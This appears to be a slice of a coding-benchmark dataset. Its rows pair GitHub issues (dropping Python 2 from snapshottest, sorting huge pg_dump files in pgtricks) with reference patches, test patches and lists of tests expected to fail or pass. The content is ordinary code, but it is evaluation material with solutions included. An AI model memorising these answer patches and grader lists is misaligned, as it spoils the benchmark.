tillerVersion: '>=2.11.0-0'
urls:
- - https://jupyterhub.github.io/helm-chart/jupyterhub-0.9.0-alpha.1.tgz
- version: 0.9.0-alpha.1
+ - https://jupyterhub.github.io/helm-chart/jupyterhub-0.9.0-alpha.1+001.g152b8c9.tgz
+ version: 0.9.0-alpha.1+001.g152b8c9
```
|
0.0
|
84df258b335fe19d56d3fc849a9241d9c4eb7afe
|
[
"tests/test_regexp.py::test__strip_identifiers_build_suffix",
"tests/test_regexp.py::test__get_identifier"
] |
[] |
{
"failed_lite_validators": [
"has_hyperlinks",
"has_media",
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2019-10-21 08:09:44+00:00
|
bsd-3-clause
| 3,365
|
|
syrusakbary__snapshottest-133
|
diff --git a/.travis.yml b/.travis.yml
index 9494339..578c891 100644
--- a/.travis.yml
+++ b/.travis.yml
@@ -1,8 +1,6 @@
language: python
sudo: false
python:
-- 2.7
-- 3.4
- 3.5
- 3.6
- 3.7
diff --git a/setup.py b/setup.py
index 1229d68..a18b9b0 100644
--- a/setup.py
+++ b/setup.py
@@ -5,7 +5,7 @@ from setuptools import setup, find_packages
with open("README.md") as f:
readme = f.read()
-tests_require = ["six", "pytest>=4.6", "pytest-cov", "nose", "django>=1.10.6"]
+tests_require = ["pytest>=4.6", "pytest-cov", "nose", "django>=1.10.6"]
setup(
name="snapshottest",
@@ -23,7 +23,7 @@ setup(
],
"nose.plugins.0.10": ["snapshottest = snapshottest.nose:SnapshotTestPlugin"],
},
- install_requires=["six>=1.10.0", "termcolor", "fastdiff>=0.1.4,<1"],
+ install_requires=["termcolor", "fastdiff>=0.1.4,<1"],
tests_require=tests_require,
extras_require={
"test": tests_require,
@@ -34,21 +34,16 @@ setup(
"nose",
],
},
+ requires_python=">=3.5",
classifiers=[
"Development Status :: 5 - Production/Stable",
+ "Framework :: Django",
"Framework :: Pytest",
"Intended Audience :: Developers",
"Operating System :: OS Independent",
- "Programming Language :: Python",
- "Programming Language :: Python :: 2",
- "Programming Language :: Python :: 2.7",
- "Programming Language :: Python :: 3",
- "Programming Language :: Python :: 3.4",
- "Programming Language :: Python :: 3.5",
- "Programming Language :: Python :: 3.6",
- "Programming Language :: Python :: 3.7",
- "Programming Language :: Python :: 3.8",
"Topic :: Software Development :: Libraries",
+ "Topic :: Software Development :: Testing",
+ "Topic :: Software Development :: Testing :: Unit",
],
license="MIT",
packages=find_packages(exclude=("tests",)),
|
syrusakbary/snapshottest
|
9818a7678b3998fcc67634fc86a427d68692c091
|
diff --git a/snapshottest/django.py b/snapshottest/django.py
index 298fd5f..9d20b9c 100644
--- a/snapshottest/django.py
+++ b/snapshottest/django.py
@@ -1,4 +1,3 @@
-from __future__ import absolute_import
from django.test import TestCase as dTestCase
from django.test import SimpleTestCase as dSimpleTestCase
from django.test.runner import DiscoverRunner
diff --git a/snapshottest/error.py b/snapshottest/error.py
index 5cd1fd7..da0ff8a 100644
--- a/snapshottest/error.py
+++ b/snapshottest/error.py
@@ -1,6 +1,3 @@
-from __future__ import unicode_literals
-
-
class SnapshotError(Exception):
pass
diff --git a/snapshottest/formatters.py b/snapshottest/formatters.py
index 089209f..39a0644 100644
--- a/snapshottest/formatters.py
+++ b/snapshottest/formatters.py
@@ -1,5 +1,4 @@
import math
-import six
from collections import defaultdict
from .sorted_dict import SortedDict
@@ -168,7 +167,7 @@ def default_formatters():
CollectionFormatter(list, format_list),
CollectionFormatter(set, format_set),
CollectionFormatter(frozenset, format_frozenset),
- TypeFormatter(six.string_types, format_str),
+ TypeFormatter((str,), format_str),
TypeFormatter((float,), format_float),
TypeFormatter((int, complex, bool, bytes), format_std_type),
GenericFormatter(),
diff --git a/snapshottest/nose.py b/snapshottest/nose.py
index 371734d..9d0e6b4 100644
--- a/snapshottest/nose.py
+++ b/snapshottest/nose.py
@@ -1,4 +1,3 @@
-from __future__ import absolute_import
import logging
import os
diff --git a/snapshottest/pytest.py b/snapshottest/pytest.py
index 2d40ca6..5b28898 100644
--- a/snapshottest/pytest.py
+++ b/snapshottest/pytest.py
@@ -1,4 +1,3 @@
-from __future__ import absolute_import
import pytest
import re
diff --git a/snapshottest/unittest.py b/snapshottest/unittest.py
index b68fce7..535b24a 100644
--- a/snapshottest/unittest.py
+++ b/snapshottest/unittest.py
@@ -1,4 +1,3 @@
-from __future__ import absolute_import
import unittest
import inspect
diff --git a/tests/test_formatter.py b/tests/test_formatter.py
index 8c53056..2b43f0a 100644
--- a/tests/test_formatter.py
+++ b/tests/test_formatter.py
@@ -1,14 +1,10 @@
# -*- coding: utf-8 -*-
-from __future__ import unicode_literals
-
import pytest
-import six
from math import isnan
from snapshottest.formatter import Formatter
-if not six.PY2:
- import unittest.mock
+import unittest.mock
@pytest.mark.parametrize(
@@ -33,45 +29,33 @@ def test_text_formatting(text_value, expected):
formatted = formatter(text_value)
assert formatted == expected
- if six.PY2:
- # Also check that Python 2 str value formats the same as the unicode value.
- # (If a test case raises UnicodeEncodeError in here, it should be moved to
- # the non_ascii verson of this test, below.)
- py2_str_value = text_value.encode("ASCII")
- py2_str_formatted = formatter(py2_str_value)
- assert py2_str_formatted == expected
-
-# When unicode snapshots are saved in Python 2, there's no easy way to generate
-# a clean unicode_literals repr that doesn't use escape sequences. But the
-# resulting snapshots are still valid on Python 3 (and vice versa).
@pytest.mark.parametrize(
- "text_value, expected_py3, expected_py2",
+ "text_value, expected",
[
- ("encodage précis", "'encodage précis'", "'encodage pr\\xe9cis'"),
- ("精确的编码", "'精确的编码'", "'\\u7cbe\\u786e\\u7684\\u7f16\\u7801'"),
+ ("encodage précis", "'encodage précis'"),
+ ("精确的编码", "'精确的编码'"),
# backslash [unicode repr can't just be `"u'{}'".format(value)`]
- ("omvänt\\snedstreck", "'omvänt\\\\snedstreck'", "'omv\\xe4nt\\\\snedstreck'"),
+ ("omvänt\\snedstreck", "'omvänt\\\\snedstreck'"),
# multiline
- ("ett\ntvå\n", "'''ett\ntvå\n'''", "'''ett\ntv\\xe5\n'''"),
+ ("ett\ntvå\n", "'''ett\ntvå\n'''"),
],
)
-def test_non_ascii_text_formatting(text_value, expected_py3, expected_py2):
- expected = expected_py2 if six.PY2 else expected_py3
+def test_non_ascii_text_formatting(text_value, expected):
formatter = Formatter()
formatted = formatter(text_value)
assert formatted == expected
-if not six.PY2:
- # https://github.com/syrusakbary/snapshottest/issues/115
- def test_can_normalize_unittest_mock_call_object():
- formatter = Formatter()
- print(formatter.normalize(unittest.mock.call(1, 2, 3)))
+# https://github.com/syrusakbary/snapshottest/issues/115
+def test_can_normalize_unittest_mock_call_object():
+ formatter = Formatter()
+ print(formatter.normalize(unittest.mock.call(1, 2, 3)))
+
- def test_can_normalize_iterator_objects():
- formatter = Formatter()
- print(formatter.normalize(x for x in range(3)))
+def test_can_normalize_iterator_objects():
+ formatter = Formatter()
+ print(formatter.normalize(x for x in range(3)))
@pytest.mark.parametrize(
diff --git a/tests/test_module.py b/tests/test_module.py
index cef2207..5ad2758 100644
--- a/tests/test_module.py
+++ b/tests/test_module.py
@@ -1,5 +1,3 @@
-from __future__ import unicode_literals
-
import pytest
from snapshottest import Snapshot
diff --git a/tests/test_snapshot_test.py b/tests/test_snapshot_test.py
index 9249478..9084f87 100644
--- a/tests/test_snapshot_test.py
+++ b/tests/test_snapshot_test.py
@@ -1,5 +1,3 @@
-from __future__ import unicode_literals
-
import pytest
from collections import OrderedDict
diff --git a/tests/test_sorted_dict.py b/tests/test_sorted_dict.py
index b8217d8..41ff194 100644
--- a/tests/test_sorted_dict.py
+++ b/tests/test_sorted_dict.py
@@ -1,5 +1,4 @@
# -*- coding: utf-8 -*-
-from __future__ import unicode_literals
import enum
import pytest
|
Require Python 3
Since Python 2 has been deprecated, I suggest we drop support for it the next major release. Many libraries, including developer tools, have done so… pip, pytest, etc.
IMO it is not worth spending the limited volunteer development efforts we have to keep this working on an obsolete platform.
|
0.0
|
9818a7678b3998fcc67634fc86a427d68692c091
|
[
"tests/test_snapshot_test.py::test_snapshot_matches_itself[{'a',"
] |
[
"tests/test_formatter.py::test_text_formatting[abc-'abc']",
"tests/test_formatter.py::test_text_formatting[-'']",
"tests/test_formatter.py::test_text_formatting[back\\\\slash-'back\\\\\\\\slash']",
"tests/test_formatter.py::test_text_formatting[it",
"tests/test_formatter.py::test_text_formatting[it's",
"tests/test_formatter.py::test_text_formatting[one\\ntwo\\n-'''one\\ntwo\\n''']",
"tests/test_formatter.py::test_text_formatting[three\\n'''quotes-\"\"\"three\\n'''quotes\"\"\"]",
"tests/test_formatter.py::test_text_formatting[so",
"tests/test_formatter.py::test_non_ascii_text_formatting[encodage",
"tests/test_formatter.py::test_non_ascii_text_formatting[\\u7cbe\\u786e\\u7684\\u7f16\\u7801-'\\u7cbe\\u786e\\u7684\\u7f16\\u7801']",
"tests/test_formatter.py::test_non_ascii_text_formatting[omv\\xe4nt\\\\snedstreck-'omv\\xe4nt\\\\\\\\snedstreck']",
"tests/test_formatter.py::test_non_ascii_text_formatting[ett\\ntv\\xe5\\n-'''ett\\ntv\\xe5\\n''']",
"tests/test_formatter.py::test_can_normalize_unittest_mock_call_object",
"tests/test_formatter.py::test_can_normalize_iterator_objects",
"tests/test_formatter.py::test_basic_formatting_parsing[0]",
"tests/test_formatter.py::test_basic_formatting_parsing[12.7]",
"tests/test_formatter.py::test_basic_formatting_parsing[True]",
"tests/test_formatter.py::test_basic_formatting_parsing[False]",
"tests/test_formatter.py::test_basic_formatting_parsing[None]",
"tests/test_formatter.py::test_basic_formatting_parsing[-inf]",
"tests/test_formatter.py::test_basic_formatting_parsing[inf]",
"tests/test_formatter.py::test_formatting_parsing_nan",
"tests/test_module.py::TestSnapshotModuleLoading::test_load_not_yet_saved",
"tests/test_module.py::TestSnapshotModuleLoading::test_load_missing_package",
"tests/test_module.py::TestSnapshotModuleLoading::test_load_corrupted_snapshot",
"tests/test_snapshot_test.py::test_snapshot_matches_itself['abc']",
"tests/test_snapshot_test.py::test_snapshot_matches_itself[b'abc']",
"tests/test_snapshot_test.py::test_snapshot_matches_itself[123]",
"tests/test_snapshot_test.py::test_snapshot_matches_itself[123.456]",
"tests/test_snapshot_test.py::test_snapshot_matches_itself[{'a':",
"tests/test_snapshot_test.py::test_snapshot_matches_itself[['a',",
"tests/test_snapshot_test.py::test_snapshot_matches_itself[('a',",
"tests/test_snapshot_test.py::test_snapshot_matches_itself[('a',)]",
"tests/test_snapshot_test.py::test_snapshot_matches_itself[None]",
"tests/test_snapshot_test.py::test_snapshot_matches_itself[False]",
"tests/test_snapshot_test.py::test_snapshot_matches_itself['']",
"tests/test_snapshot_test.py::test_snapshot_matches_itself[b'']",
"tests/test_snapshot_test.py::test_snapshot_matches_itself[{}]",
"tests/test_snapshot_test.py::test_snapshot_matches_itself[[]]",
"tests/test_snapshot_test.py::test_snapshot_matches_itself[set()]",
"tests/test_snapshot_test.py::test_snapshot_matches_itself[()]",
"tests/test_snapshot_test.py::test_snapshot_matches_itself[0]",
"tests/test_snapshot_test.py::test_snapshot_matches_itself[0.0]",
"tests/test_snapshot_test.py::test_snapshot_matches_itself[OrderedDict([('a',",
"tests/test_snapshot_test.py::test_snapshot_matches_itself[OrderedDict([('c',",
"tests/test_snapshot_test.py::test_snapshot_does_not_match_other_values[snapshot",
"tests/test_sorted_dict.py::test_sorted_dict[key1-value]",
"tests/test_sorted_dict.py::test_sorted_dict[key2-42]",
"tests/test_sorted_dict.py::test_sorted_dict[key3-value2]",
"tests/test_sorted_dict.py::test_sorted_dict[key4-value3]",
"tests/test_sorted_dict.py::test_sorted_dict[key5-value4]",
"tests/test_sorted_dict.py::test_sorted_dict[key6-value5]",
"tests/test_sorted_dict.py::test_sorted_dict[key7-value6]",
"tests/test_sorted_dict.py::test_sorted_dict[key8-value7]",
"tests/test_sorted_dict.py::test_sorted_dict_string_key",
"tests/test_sorted_dict.py::test_sorted_dict_int_key",
"tests/test_sorted_dict.py::test_sorted_dict_intenum",
"tests/test_sorted_dict.py::test_sorted_dict_enum",
"tests/test_sorted_dict.py::test_sorted_dict_enum_value",
"tests/test_sorted_dict.py::test_sorted_dict_enum_key"
] |
{
"failed_lite_validators": [
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2020-09-29 23:35:10+00:00
|
mit
| 5,822
|
|
akaihola__pgtricks-13
|
diff --git a/CHANGES.rst b/CHANGES.rst
index 3fc8314..c3796a7 100644
--- a/CHANGES.rst
+++ b/CHANGES.rst
@@ -13,6 +13,9 @@ Removed
Fixed
-----
+- Very large tables are now sorted without crashing. This is done by merge sorting
+ in temporary files.
+
1.0.0_ / 2021-09-11
====================
diff --git a/mypy.ini b/mypy.ini
index ed30dab..bbb2f00 100644
--- a/mypy.ini
+++ b/mypy.ini
@@ -32,6 +32,9 @@ strict_equality = True
disallow_any_decorated = False
disallow_untyped_defs = False
+[mypy-pgtricks.mergesort]
+disallow_any_explicit = False
+
[mypy-pytest.*]
ignore_missing_imports = True
diff --git a/pgtricks/mergesort.py b/pgtricks/mergesort.py
new file mode 100644
index 0000000..f22f020
--- /dev/null
+++ b/pgtricks/mergesort.py
@@ -0,0 +1,76 @@
+"""Merge sort implementation to handle large files by sorting them in partitions."""
+
+from __future__ import annotations
+
+import sys
+from heapq import merge
+from tempfile import TemporaryFile
+from typing import IO, Any, Callable, Iterable, Iterator, cast
+
+
+class MergeSort(Iterable[str]):
+ """Merge sort implementation to handle large files by sorting them in partitions."""
+
+ def __init__(
+ self,
+ key: Callable[[str], Any] = str,
+ directory: str = ".",
+ max_memory: int = 190,
+ ) -> None:
+ """Initialize the merge sort object."""
+ self._key = key
+ self._directory = directory
+ self._max_memory = max_memory
+ # Use binary mode to avoid newline conversion on Windows.
+ self._partitions: list[IO[bytes]] = []
+ self._iterating: Iterable[str] | None = None
+ self._buffer: list[str] = []
+ self._memory_counter: int = sys.getsizeof(self._buffer)
+ self._flush()
+
+ def append(self, line: str) -> None:
+ """Append a line to the set of lines to be sorted."""
+ if self._iterating:
+ message = "Can't append lines after starting to sort"
+ raise ValueError(message)
+ self._memory_counter -= sys.getsizeof(self._buffer)
+ self._buffer.append(line)
+ self._memory_counter += sys.getsizeof(self._buffer)
+ self._memory_counter += sys.getsizeof(line)
+ if self._memory_counter >= self._max_memory:
+ self._flush()
+
+ def _flush(self) -> None:
+ if self._buffer:
+ # Use binary mode to avoid newline conversion on Windows.
+ self._partitions.append(TemporaryFile(mode="w+b", dir=self._directory))
+ self._partitions[-1].writelines(
+ line.encode("UTF-8") for line in sorted(self._buffer, key=self._key)
+ )
+ self._buffer = []
+ self._memory_counter = sys.getsizeof(self._buffer)
+
+ def __next__(self) -> str:
+ """Return the next line in the sorted list of lines."""
+ if not self._iterating:
+ if self._partitions:
+ # At least one partition has already been flushed to disk.
+ # Iterate the merge sort for all partitions.
+ self._flush()
+ for partition in self._partitions:
+ partition.seek(0)
+ self._iterating = merge(
+ *[
+ (line.decode("UTF-8") for line in partition)
+ for partition in self._partitions
+ ],
+ key=self._key,
+ )
+ else:
+ # All lines fit in memory. Iterate the list of lines directly.
+ self._iterating = iter(sorted(self._buffer, key=self._key))
+ return next(cast(Iterator[str], self._iterating))
+
+ def __iter__(self) -> Iterator[str]:
+ """Return the iterator object for the sorted list of lines."""
+ return self
diff --git a/pgtricks/pg_dump_splitsort.py b/pgtricks/pg_dump_splitsort.py
index 56908ea..aab1258 100755
--- a/pgtricks/pg_dump_splitsort.py
+++ b/pgtricks/pg_dump_splitsort.py
@@ -1,15 +1,23 @@
#!/usr/bin/env python
+from __future__ import annotations
+
import functools
+import io
import os
import re
-import sys
-from typing import IO, List, Match, Optional, Pattern, Tuple, Union, cast
+from argparse import ArgumentParser
+from typing import IO, Iterable, Match, Pattern, cast
+
+from pgtricks.mergesort import MergeSort
COPY_RE = re.compile(r'COPY .*? \(.*?\) FROM stdin;\n$')
+KIBIBYTE, MEBIBYTE, GIBIBYTE = 2**10, 2**20, 2**30
+MEMORY_UNITS = {"": 1, "k": KIBIBYTE, "m": MEBIBYTE, "g": GIBIBYTE}
-def try_float(s1: str, s2: str) -> Union[Tuple[str, str], Tuple[float, float]]:
+def try_float(s1: str, s2: str) -> tuple[str, str] | tuple[float, float]:
+ """Convert two strings to floats. Return original ones on conversion error."""
if not s1 or not s2 or s1[0] not in '0123456789.-' or s2[0] not in '0123456789.-':
# optimization
return s1, s2
@@ -22,7 +30,8 @@ def try_float(s1: str, s2: str) -> Union[Tuple[str, str], Tuple[float, float]]:
def linecomp(l1: str, l2: str) -> int:
p1 = l1.split('\t', 1)
p2 = l2.split('\t', 1)
- v1, v2 = cast(Tuple[float, float], try_float(p1[0], p2[0]))
+ # TODO: unquote cast after support for Python 3.8 is dropped
+ v1, v2 = cast("tuple[float, float]", try_float(p1[0], p2[0]))
result = (v1 > v2) - (v1 < v2)
# modifying a line to see whether Darker works:
if not result and len(p1) == len(p2) == 2:
@@ -37,9 +46,10 @@ SEQUENCE_SET_RE = re.compile(r'-- Name: .+; Type: SEQUENCE SET; Schema: |'
class Matcher(object):
def __init__(self) -> None:
- self._match: Optional[Match[str]] = None
+ self._match: Match[str] | None = None
- def match(self, pattern: Pattern[str], data: str) -> Optional[Match[str]]:
+ def match(self, pattern: Pattern[str], data: str) -> Match[str] | None:
+ """Match the regular expression pattern against the data."""
self._match = pattern.match(data)
return self._match
@@ -49,34 +59,44 @@ class Matcher(object):
return self._match.group(group1)
-def split_sql_file(sql_filepath: str) -> None:
-
+def split_sql_file( # noqa: C901 too complex
+ sql_filepath: str,
+ max_memory: int = 100 * MEBIBYTE,
+) -> None:
+ """Split a SQL file so that each COPY statement is in its own file."""
directory = os.path.dirname(sql_filepath)
- output: Optional[IO[str]] = None
- buf: List[str] = []
+ # `output` needs to be instantiated before the inner functions are defined.
+ # Assign it a dummy string I/O object so type checking is happy.
+ # This will be replaced with the prologue SQL file object.
+ output: IO[str] = io.StringIO()
+ buf: list[str] = []
def flush() -> None:
- cast(IO[str], output).writelines(buf)
+ output.writelines(buf)
buf[:] = []
+ def writelines(lines: Iterable[str]) -> None:
+ if buf:
+ flush()
+ output.writelines(lines)
+
def new_output(filename: str) -> IO[str]:
if output:
output.close()
return open(os.path.join(directory, filename), 'w')
- copy_lines: Optional[List[str]] = None
+ sorted_data_lines: MergeSort | None = None
counter = 0
output = new_output('0000_prologue.sql')
matcher = Matcher()
for line in open(sql_filepath):
- if copy_lines is None:
+ if sorted_data_lines is None:
if line in ('\n', '--\n'):
buf.append(line)
elif line.startswith('SET search_path = '):
- flush()
- buf.append(line)
+ writelines([line])
else:
if matcher.match(DATA_COMMENT_RE, line):
counter += 1
@@ -86,28 +106,54 @@ def split_sql_file(sql_filepath: str) -> None:
schema=matcher.group('schema'),
table=matcher.group('table')))
elif COPY_RE.match(line):
- copy_lines = []
+ sorted_data_lines = MergeSort(
+ key=functools.cmp_to_key(linecomp),
+ max_memory=max_memory,
+ )
elif SEQUENCE_SET_RE.match(line):
pass
elif 1 <= counter < 9999:
counter = 9999
output = new_output('%04d_epilogue.sql' % counter)
- buf.append(line)
- flush()
+ writelines([line])
else:
- if line == '\\.\n':
- copy_lines.sort(key=functools.cmp_to_key(linecomp))
- buf.extend(copy_lines)
- buf.append(line)
- flush()
- copy_lines = None
+ if line == "\\.\n":
+ writelines(sorted_data_lines)
+ writelines(line)
+ sorted_data_lines = None
else:
- copy_lines.append(line)
+ sorted_data_lines.append(line)
flush()
+def memory_size(size: str) -> int:
+ """Parse a human-readable memory size.
+
+ :param size: The memory size to parse, e.g. "100MB".
+ :return: The memory size in bytes.
+ :raise ValueError: If the memory size is invalid.
+
+ """
+ match = re.match(r"([\d._]+)\s*([kmg]?)b?", size.lower().strip())
+ if not match:
+ message = f"Invalid memory size: {size}"
+ raise ValueError(message)
+ return int(float(match.group(1)) * MEMORY_UNITS[match.group(2)])
+
+
def main() -> None:
- split_sql_file(sys.argv[1])
+ parser = ArgumentParser(description="Split a SQL file into smaller files.")
+ parser.add_argument("sql_filepath", help="The SQL file to split.")
+ parser.add_argument(
+ "-m",
+ "--max-memory",
+ default=100 * MEBIBYTE,
+ type=memory_size,
+ help="Max memory to use, e.g. 50_000, 200000000, 100kb, 100MB (default), 2Gig.",
+ )
+ args = parser.parse_args()
+
+ split_sql_file(args.sql_filepath, args.max_memory)
if __name__ == '__main__':
diff --git a/pyproject.toml b/pyproject.toml
index 086fffd..6f3739b 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -21,7 +21,9 @@ ignore = [
"ANN201", # Missing return type annotation for public function
#"ANN204", # Missing return type annotation for special method `__init__`
#"C408", # Unnecessary `dict` call (rewrite as a literal)
+ "PLR2004", # Magic value used in comparison
"S101", # Use of `assert` detected
+ "SLF001", # Private member accessed
]
[tool.ruff.lint.isort]
|
akaihola/pgtricks
|
c5ba05b4db22a74388b0c2b863e1c4a9f0467c8b
|
diff --git a/pgtricks/tests/test_mergesort.py b/pgtricks/tests/test_mergesort.py
new file mode 100644
index 0000000..6f7c0b6
--- /dev/null
+++ b/pgtricks/tests/test_mergesort.py
@@ -0,0 +1,110 @@
+"""Tests for the `pgtricks.mergesort` module."""
+
+import functools
+from types import GeneratorType
+from typing import Iterable, cast
+
+import pytest
+
+from pgtricks.mergesort import MergeSort
+from pgtricks.pg_dump_splitsort import linecomp
+
+# This is the biggest amount of memory which can't hold two one-character lines on any
+# platform. On Windows it's slightly smaller than on Unix.
+JUST_BELOW_TWO_SHORT_LINES = 174
+
+
+@pytest.mark.parametrize("lf", ["\n", "\r\n"])
+def test_mergesort_append(tmpdir, lf):
+ """Test appending lines to the merge sort object."""
+ m = MergeSort(directory=tmpdir, max_memory=JUST_BELOW_TWO_SHORT_LINES)
+ m.append(f"1{lf}")
+ assert m._buffer == [f"1{lf}"]
+ m.append(f"2{lf}")
+ assert m._buffer == []
+ m.append(f"3{lf}")
+ assert m._buffer == [f"3{lf}"]
+ assert len(m._partitions) == 1
+ pos = m._partitions[0].tell()
+ m._partitions[0].seek(0)
+ assert m._partitions[0].read() == f"1{lf}2{lf}".encode()
+ assert pos == len(f"1{lf}2{lf}")
+
+
+@pytest.mark.parametrize("lf", ["\n", "\r\n"])
+def test_mergesort_flush(tmpdir, lf):
+ """Test flushing the buffer to disk."""
+ m = MergeSort(directory=tmpdir, max_memory=JUST_BELOW_TWO_SHORT_LINES)
+ for value in [1, 2, 3]:
+ m.append(f"{value}{lf}")
+ m._flush()
+ assert len(m._partitions) == 2
+ assert m._partitions[0].tell() == len(f"1{lf}2{lf}")
+ m._partitions[0].seek(0)
+ assert m._partitions[0].read() == f"1{lf}2{lf}".encode()
+ pos = m._partitions[1].tell()
+ m._partitions[1].seek(0)
+ assert m._partitions[1].read() == f"3{lf}".encode()
+ assert pos == len(f"3{lf}")
+
+
+@pytest.mark.parametrize("lf", ["\n", "\r\n"])
+def test_mergesort_iterate_disk(tmpdir, lf):
+ """Test iterating over the sorted lines on disk."""
+ m = MergeSort(directory=tmpdir, max_memory=JUST_BELOW_TWO_SHORT_LINES)
+ for value in [3, 1, 4, 1, 5, 9, 2, 6, 5, 3, 8, 4]:
+ m.append(f"{value}{lf}")
+ assert next(m) == f"1{lf}"
+ assert isinstance(m._iterating, GeneratorType)
+ assert next(m) == f"1{lf}"
+ assert next(m) == f"2{lf}"
+ assert next(m) == f"3{lf}"
+ assert next(m) == f"3{lf}"
+ assert next(m) == f"4{lf}"
+ assert next(m) == f"4{lf}"
+ assert next(m) == f"5{lf}"
+ assert next(m) == f"5{lf}"
+ assert next(m) == f"6{lf}"
+ assert next(m) == f"8{lf}"
+ assert next(m) == f"9{lf}"
+ with pytest.raises(StopIteration):
+ next(m)
+
+
+@pytest.mark.parametrize("lf", ["\n", "\r\n"])
+def test_mergesort_iterate_memory(tmpdir, lf):
+ """Test iterating over the sorted lines when all lines fit in memory."""
+ m = MergeSort(
+ directory=tmpdir,
+ max_memory=1000000,
+ key=functools.cmp_to_key(linecomp),
+ )
+ for value in [3, 1, 4, 1, 5, 9, 2, 10, 6, 5, 3, 8, 4]:
+ m.append(f"{value}{lf}")
+ assert next(m) == f"1{lf}"
+ assert not isinstance(m._iterating, GeneratorType)
+ assert iter(cast(Iterable[str], m._iterating)) is m._iterating
+ assert next(m) == f"1{lf}"
+ assert next(m) == f"2{lf}"
+ assert next(m) == f"3{lf}"
+ assert next(m) == f"3{lf}"
+ assert next(m) == f"4{lf}"
+ assert next(m) == f"4{lf}"
+ assert next(m) == f"5{lf}"
+ assert next(m) == f"5{lf}"
+ assert next(m) == f"6{lf}"
+ assert next(m) == f"8{lf}"
+ assert next(m) == f"9{lf}"
+ assert next(m) == f"10{lf}"
+ with pytest.raises(StopIteration):
+ next(m)
+
+
+@pytest.mark.parametrize("lf", ["\n", "\r\n"])
+def test_mergesort_key(tmpdir, lf):
+ """Test sorting lines based on a key function."""
+ m = MergeSort(directory=tmpdir, key=lambda line: -int(line[0]))
+ for value in [3, 1, 4, 1, 5, 9, 2, 6, 5, 3, 8, 4]:
+ m.append(f"{value}{lf}")
+ result = "".join(value[0] for value in m)
+ assert result == "986554433211"
diff --git a/pgtricks/tests/test_pg_dump_splitsort.py b/pgtricks/tests/test_pg_dump_splitsort.py
index 3305c03..74e6b56 100644
--- a/pgtricks/tests/test_pg_dump_splitsort.py
+++ b/pgtricks/tests/test_pg_dump_splitsort.py
@@ -1,8 +1,9 @@
from functools import cmp_to_key
+from textwrap import dedent
import pytest
-from pgtricks.pg_dump_splitsort import linecomp, try_float
+from pgtricks.pg_dump_splitsort import linecomp, memory_size, split_sql_file, try_float
@pytest.mark.parametrize(
@@ -101,3 +102,111 @@ def test_linecomp_by_sorting():
[r'\N', r'\N', r'\N'],
[r'\N', 'foo', '.42'],
]
+
+
+PROLOGUE = dedent(
+ """
+
+ --
+ -- Name: table1; Type: TABLE; Schema: public; Owner:
+ --
+
+ (information for table1 goes here)
+ """,
+)
+
+TABLE1_COPY = dedent(
+ r"""
+
+ -- Data for Name: table1; Type: TABLE DATA; Schema: public;
+
+ COPY foo (id) FROM stdin;
+ 3
+ 1
+ 4
+ 1
+ 5
+ 9
+ 2
+ 6
+ 5
+ 3
+ 8
+ 4
+ \.
+ """,
+)
+
+TABLE1_COPY_SORTED = dedent(
+ r"""
+
+ -- Data for Name: table1; Type: TABLE DATA; Schema: public;
+
+ COPY foo (id) FROM stdin;
+ 1
+ 1
+ 2
+ 3
+ 3
+ 4
+ 4
+ 5
+ 5
+ 6
+ 8
+ 9
+ \.
+ """,
+)
+
+EPILOGUE = dedent(
+ """
+ -- epilogue
+ """,
+)
+
+
+def test_split_sql_file(tmpdir):
+ """Test splitting a SQL file with COPY statements."""
+ sql_file = tmpdir / "test.sql"
+ sql_file.write(PROLOGUE + TABLE1_COPY + EPILOGUE)
+
+ split_sql_file(sql_file, max_memory=190)
+
+ split_files = sorted(path.relto(tmpdir) for path in tmpdir.listdir())
+ assert split_files == [
+ "0000_prologue.sql",
+ "0001_public.table1.sql",
+ "9999_epilogue.sql",
+ "test.sql",
+ ]
+ assert (tmpdir / "0000_prologue.sql").read() == PROLOGUE
+ assert (tmpdir / "0001_public.table1.sql").read() == TABLE1_COPY_SORTED
+ assert (tmpdir / "9999_epilogue.sql").read() == EPILOGUE
+
+
+@pytest.mark.parametrize(
+ ("size", "expect"),
+ [
+ ("0", 0),
+ ("1", 1),
+ ("1k", 1024),
+ ("1m", 1024**2),
+ ("1g", 1024**3),
+ ("100_000K", 102400000),
+ ("1.5M", 1536 * 1024),
+ ("1.5G", 1536 * 1024**2),
+ ("1.5", 1),
+ ("1.5 kibibytes", 1536),
+ ("1.5 Megabytes", 1024 * 1536),
+ ("1.5 Gigs", 1024**2 * 1536),
+ ("1.5KB", 1536),
+ (".5MB", 512 * 1024),
+ ("20GB", 20 * 1024**3),
+ ],
+)
+def test_memory_size(size, expect):
+ """Test parsing human-readable memory sizes with `memory_size`."""
+ result = memory_size(size)
+
+ assert result == expect
|
Use Too Much Memory, Killed by System
I'm using this project to split the .sql file to make the pg_dump dumped file in an order that backup programs can deduplicate the existing data.
The dumped file is more than 1000GB, which is a kind of big. So I guess the data may be sorted in memory, so it's easy to use out.
|
0.0
|
c5ba05b4db22a74388b0c2b863e1c4a9f0467c8b
|
[
"pgtricks/tests/test_mergesort.py::mypy",
"pgtricks/tests/test_mergesort.py::mypy-status",
"pgtricks/tests/test_mergesort.py::test_mergesort_append[\\n]",
"pgtricks/tests/test_mergesort.py::test_mergesort_append[\\r\\n]",
"pgtricks/tests/test_mergesort.py::test_mergesort_flush[\\n]",
"pgtricks/tests/test_mergesort.py::test_mergesort_flush[\\r\\n]",
"pgtricks/tests/test_mergesort.py::test_mergesort_iterate_disk[\\n]",
"pgtricks/tests/test_mergesort.py::test_mergesort_iterate_disk[\\r\\n]",
"pgtricks/tests/test_mergesort.py::test_mergesort_iterate_memory[\\n]",
"pgtricks/tests/test_mergesort.py::test_mergesort_iterate_memory[\\r\\n]",
"pgtricks/tests/test_mergesort.py::test_mergesort_key[\\n]",
"pgtricks/tests/test_mergesort.py::test_mergesort_key[\\r\\n]",
"pgtricks/tests/test_pg_dump_splitsort.py::mypy",
"pgtricks/tests/test_pg_dump_splitsort.py::test_try_float[--expect0]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_try_float[foo--expect1]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_try_float[foo-bar-expect2]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_try_float[0-1-expect3]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_try_float[0-one-expect4]",
"pgtricks/tests/test_pg_dump_splitsort.py::test_try_float[0.0-0.0-expect5]",
